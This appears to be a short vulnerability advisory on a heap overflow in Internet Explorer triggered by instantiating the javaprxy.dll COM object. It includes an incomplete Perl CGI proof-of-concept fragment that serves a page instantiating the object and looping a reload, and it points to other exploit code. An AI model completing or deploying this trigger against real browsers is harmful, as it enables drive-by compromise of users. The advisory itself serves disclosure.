Microsoft Internet Explorer Javaprxy.DLL COM Object Instantiation Heap Overflow Vulnerability
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following proof-of-concept CGI script was provided to demonstrate the vulnerability. An additional proof of concept (javaprxy.pl) is made available by FrSIRT:
# in order for this to work javaprxy.dll must be available on the client.
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll
my $html1 = "<html><body>\n<object
my $html2 = "\n</body><script>location.reload();</script></html>\n";
print "Content-Type: text/html;\r\n\r\n";
Exploit code javaprxy_exp.c has been provided by K.K.Senthil Velan <email@example.com>.